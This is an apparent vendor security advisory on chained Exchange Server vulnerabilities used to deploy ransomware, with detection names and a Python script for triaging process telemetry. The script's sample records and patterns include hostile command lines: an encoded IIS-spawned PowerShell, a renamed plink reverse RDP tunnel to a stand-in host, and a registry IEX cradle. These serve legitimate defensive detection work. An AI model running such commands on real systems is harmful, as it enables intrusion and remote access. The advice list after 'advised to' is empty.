22 Dec / 2022
Cyber Security
Microsoft Exchange Server (On-Premises) 2013, 2016 and 2019 servers that have not applied update KB5019758, released on November 8.
There has been an increase in attacks against On-Prem Exchange Servers that are relying on Microsoft's URL Rewrite mitigations as a defence against CVE-2022-41080 and CVE-2022-41082.
Threat actors are chaining vulnerabilities CVE-2022-41080 and CVE-2022-41082 to infiltrate networks and deploy ransomware.
Attackers are using SSRF vulnerability CVE-2022-41040 to target the backend PowerShell service through Outlook Web Access.
Once the PowerShell service has been reached, vulnerability CVE-2022-41082 is exploited to execute arbitrary commands on the device.
System Administrators are advised to:
Attacker Technique - PowerShell Registry Cradle
Suspicious Process - PowerShell System.Net.Sockets.TcpClient
Suspicious Process - Exchange Server Spawns Process
PowerShell - Obfuscated Script
Webshell - IIS Spawns PowerShell
Attacker Technique - Plink Redirecting RDP
Attacker Technique - Renamed Plink
Suspicious Process - Started From Users Music Directory
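The detection names above describe process-creation behaviour that a defender can check for in endpoint telemetry. The following is an added example written for this page, not Cythera's or Rapid7's rule logic: it applies simple versions of those checks to constructed, Sysmon-style process-creation records (fields Image, ParentImage, CommandLine and OriginalFileName are assumed; the MSExchange* service executable names and every sample value are constructed for illustration).

```python
"""Toy process-creation triage matching the detection names listed above.

Added example, not vendor rule logic. Records are constructed Sysmon-style
(Event ID 1) dictionaries; field names and Exchange service names are assumed.
"""
from pathlib import PureWindowsPath

IIS_WORKER = "w3wp.exe"          # IIS worker process hosting OWA
EXCHANGE_PREFIX = "msexchange"   # assumed prefix of Exchange service executables
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
POWERSHELLS = {"powershell.exe", "pwsh.exe"}


def image_name(path: str) -> str:
    """Final path component, lower-cased, so directory and case are ignored."""
    return PureWindowsPath(path).name.lower()


def started_from_music(path: str) -> bool:
    """True for C:\\Users\\<name>\\Music\\... in any casing."""
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    if "users" not in parts:
        return False
    i = parts.index("users")
    return len(parts) > i + 2 and parts[i + 2] == "music"


def classify_event(event: dict) -> list[str]:
    """Return every detection label that matches one process-creation event."""
    image = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmd_l = event.get("CommandLine", "").lower()
    original = event.get("OriginalFileName", "").lower()
    hits = []

    # Web-facing or Exchange service processes should not launch shells.
    if image in SHELLS:
        if parent == IIS_WORKER:
            hits.append("Webshell - IIS Spawns PowerShell")
        elif parent.startswith(EXCHANGE_PREFIX):
            hits.append("Suspicious Process - Exchange Server Spawns Process")

    if started_from_music(event.get("Image", "")):
        hits.append("Suspicious Process - Started From Users Music Directory")

    if image in POWERSHELLS:
        if "system.net.sockets.tcpclient" in cmd_l:
            hits.append("Suspicious Process - PowerShell System.Net.Sockets.TcpClient")
        # Crude obfuscation heuristic: encoded command or inline base64 decoding.
        if any(t in cmd_l for t in ("-enc ", "-encodedcommand", "frombase64string")):
            hits.append("PowerShell - Obfuscated Script")
        # Script body read from a registry value and passed to Invoke-Expression.
        reads_registry = "get-itemproperty" in cmd_l and ("hklm:" in cmd_l or "hkcu:" in cmd_l)
        executes = "iex" in cmd_l or "invoke-expression" in cmd_l
        if reads_registry and executes:
            hits.append("Attacker Technique - PowerShell Registry Cradle")

    # Plink identified by PE metadata, so renaming the file does not hide it.
    is_plink = original == "plink.exe" or image == "plink.exe"
    if is_plink and image != "plink.exe":
        hits.append("Attacker Technique - Renamed Plink")
    if is_plink and "-r " in cmd_l and ":3389" in cmd_l:
        hits.append("Attacker Technique - Plink Redirecting RDP")

    return hits


def scan(events) -> list:
    """Return (index, labels) for every event that triggered at least one label."""
    results = []
    for i, event in enumerate(events):
        labels = classify_event(event)
        if labels:
            results.append((i, labels))
    return results


# Constructed sample telemetry (not real observations).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAuAC4ALgA=",
     "OriginalFileName": "PowerShell.EXE"},
    {"Image": r"C:\Users\svc_backup\Music\svchost.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "svchost.exe -R 0.0.0.0:3389:127.0.0.1:3389 -pw REDACTED user@203.0.113.10",
     "OriginalFileName": "plink.exe"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "OUTLOOK.EXE", "OriginalFileName": "Outlook.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeTransport.exe",
     "CommandLine": "cmd.exe /c whoami", "OriginalFileName": "Cmd.Exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -c "IEX (Get-ItemProperty HKCU:\Software\Contoso).payload; $c = New-Object System.Net.Sockets.TcpClient"',
     "OriginalFileName": "PowerShell.EXE"},
]

if __name__ == "__main__":
    for index, labels in scan(SAMPLE_EVENTS):
        print(index, labels)
```

The heuristics are deliberately simple string checks; a production rule would use parsed command-line arguments and signed-binary checks, but the parent/child relationship and the PE OriginalFileName field are the parts that matter most for the Exchange and Plink cases.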
Further information on the vulnerability is available from Microsoft, Rapid7 and CrowdStrike.
Cythera Vulnerability Management Clients are actively being scanned for any vulnerable instances of Microsoft Exchange.